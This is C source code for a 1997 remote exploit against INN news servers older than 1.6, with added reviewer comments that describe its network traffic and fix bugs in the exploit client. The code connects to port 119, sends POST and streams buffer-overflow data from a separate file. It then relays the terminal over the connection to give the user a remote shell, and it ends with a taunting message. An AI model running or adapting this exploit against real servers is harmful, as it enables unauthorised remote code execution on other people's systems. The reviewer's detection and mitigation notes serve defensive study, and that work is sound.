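/*
 * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
 * To compile: cc nnrp.c -o nnrp. Usage: nnrp .
 * (C) 1997 by Method of Dweebs
 *
 * Review notes (added by reviewer):
 *  - The "Usage:" line above and the usage() text below appear to have lost
 *    their argument placeholders (presumably stripped together with the
 *    angle brackets when the page was extracted). main() takes the news
 *    server host as argv[1] and a data file as argv[2].
 *  - The header names of the original #include lines were lost the same
 *    way. The list below is the set this code needs; it is not claimed to
 *    be the original list.
 *  - This file carries no payload. It only delivers the bytes of the file
 *    named on the command line, which the header says come from the
 *    separate 'innbuf' program.
 *  - What a defender would see from this client: a TCP connection to port
 *    119, the client reads the banner, sends "POST", reads the reply, pauses
 *    two seconds, streams the file contents, pauses again, and then relays
 *    stdin/stdout over the same connection. Interactive traffic on an NNTP
 *    session after a POST is the anomaly worth alerting on.
 *  - Per the header, INN releases before 1.6 are the affected ones; running
 *    a release outside that range is the mitigation the page supports.
 *  - The original client itself mishandled untrusted server output: it
 *    passed the server's reply to printf() as the format string and wrote
 *    buf[n] = '\0' with n taken straight from read() (n could be -1 or
 *    sizeof(buf)). Both are fixed below.
 */

/* Needed on glibc so that inet_aton() and herror() are declared. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define POST "POST\n"

/* Program name used as the prefix of every diagnostic; set once in main(). */
char *me;

/*
 * Resolve `name` into `addr`.
 *
 * `name` is tried as a dotted-quad first and looked up with
 * gethostbyname() only if that fails. A failed lookup prints a diagnostic
 * and exits with status 1, so this function returns only on success.
 */
void make_addr(char *name, struct in_addr *addr)
{
    struct hostent *hp;

    if (inet_aton(name, addr) != 0) {
        return;
    }

    hp = gethostbyname(name);
    if (hp == NULL) {
        fprintf(stderr, "%s: ", me);
        herror(name);
        exit(1);
    }

    /*
     * memcpy instead of the original pointer cast: the resolver buffer is a
     * char array and carries no alignment guarantee for struct in_addr.
     */
    memcpy(&addr->s_addr, hp->h_addr_list[0], sizeof addr->s_addr);
}

/*
 * Return a pointer to the last path component of `str` (the text after the
 * final '/'), or `str` itself when it contains no '/'. The result points
 * into `str`; nothing is allocated.
 */
char *bname(char *str)
{
    char *slash = strrchr(str, '/');

    return slash != NULL ? slash + 1 : str;
}

/* Print "<me>: <errstr>: <strerror(errno)>" and exit with status `err`. */
void my_err(char *errstr, int err)
{
    fprintf(stderr, "%s: ", me);
    perror(errstr);
    exit(err);
}

/*
 * Print the usage text and exit with status 1.
 *
 * NOTE(review): the strings are reproduced as found on the page; the
 * argument placeholders after "%s" look like they were lost in extraction.
 */
void usage(void)
{
    printf(
        "INN version 1.[45].x exploit by Method \n"
        "Usage: %s \n"
        "Will start a shell on the remote host.\n"
        "The second argument is the file containing the overflow data.\n", me);
    exit(1);
}

/*
 * Read at most size-1 bytes from `fd` into `buf` and NUL-terminate.
 *
 * Returns the number of bytes read (0 at end of stream), or -1 when read()
 * fails or `size` is 0. On failure `buf` is set to the empty string when
 * there is room. The terminator is always written inside the buffer, which
 * the original `n = read(fd, buf, sizeof(buf)); buf[n] = '\0';` did not
 * guarantee.
 */
static ssize_t read_text(int fd, char *buf, size_t size)
{
    ssize_t n;

    if (size == 0) {
        return -1;
    }

    n = read(fd, buf, size - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }

    buf[n] = '\0';
    return n;
}

/*
 * Relay bytes between the terminal and `netfd` until the peer closes the
 * connection or a read from it fails.
 *
 * Once stdin reaches end of file it is no longer polled; the original kept
 * it in the read set, so select() returned immediately forever and the loop
 * spun at full CPU.
 */
void select_loop(int netfd)
{
    const int in = STDIN_FILENO;
    const int out = STDOUT_FILENO;
    int watch_stdin = 1;
    char buf[512];

    for (;;) {
        fd_set rfds;
        ssize_t n;
        int ret;

        FD_ZERO(&rfds);
        if (watch_stdin) {
            FD_SET(in, &rfds);
        }
        FD_SET(netfd, &rfds);

        ret = select(netfd + 1, &rfds, NULL, NULL, NULL);
        if (ret < 0) {
            my_err("select", 1);
        }
        if (ret == 0) {
            continue;
        }

        if (watch_stdin && FD_ISSET(in, &rfds)) {
            n = read(in, buf, sizeof buf);
            if (n > 0) {
                if (write(netfd, buf, (size_t)n) < 0) {
                    my_err("write", 1);
                }
            } else {
                watch_stdin = 0;
            }
        }

        if (FD_ISSET(netfd, &rfds)) {
            n = read(netfd, buf, sizeof buf);
            if (n <= 0) {
                break;
            }
            if (write(out, buf, (size_t)n) < 0) {
                my_err("write", 1);
            }
        }
    }
}

/*
 * Open a TCP connection to port 119 on `host` and return the socket.
 * Any failure prints a diagnostic and exits with status 1.
 */
int news_sock(char *host)
{
    struct sockaddr_in sin;
    int sock;

    /* The original left the padding and unset fields of `sin` uninitialised. */
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(119);
    make_addr(host, &sin.sin_addr);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        my_err("socket", 1);
    }
    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) < 0) {
        my_err("connect", 1);
    }
    return sock;
}

/*
 * Read the server banner, send POST, read the reply, then stream the
 * contents of `file` to socket `sk`.
 *
 * Everything received from the server is untrusted. It is echoed with
 * fputs(), never used as a printf() format string, and is read through
 * read_text() so the terminator cannot land outside `buf`.
 */
void send_egg(int sk, char *file)
{
    char buf[BUFSIZ];
    ssize_t n;
    int dfd;

    dfd = open(file, O_RDONLY);
    if (dfd < 0) {
        my_err("open", 1);
    }

    printf("Executing innd exploit.. be patient.\n");

    if (read_text(sk, buf, sizeof buf) < 0) {
        my_err("read", 1);
    }
    fputs(buf, stdout);

    if (write(sk, POST, strlen(POST)) < 0) {
        my_err("write", 1);
    }

    if (read_text(sk, buf, sizeof buf) < 0) {
        my_err("read", 1);
    }
    fputs(buf, stdout);

    sleep(2);
    printf("Sending overflow data.\n");

    while ((n = read(dfd, buf, sizeof buf)) > 0) {
        if (write(sk, buf, (size_t)n) < 0) {
            my_err("write", 1);
        }
    }

    /* The original never closed the data file. */
    close(dfd);
    sleep(2);
}

/*
 * Entry point: argv[1] is the news server host, argv[2] the data file.
 * Any other argument count prints the usage text and exits with status 1.
 */
int main(int argc, char **argv)
{
    char *host;
    char *filename;
    int s;

    /* argv[0] may legally be NULL; do not hand that to bname(). */
    me = (argc > 0 && argv[0] != NULL) ? bname(argv[0]) : "nnrp";

    if (argc != 3) {
        usage();
    }

    host = argv[1];
    filename = argv[2];

    s = news_sock(host);
    send_egg(s, filename);
    select_loop(s);

    fprintf(stderr, "Connection closed.\n");
    printf("Remember: Security is futile. Dweebs WILL own you.\n");
    return 0;
}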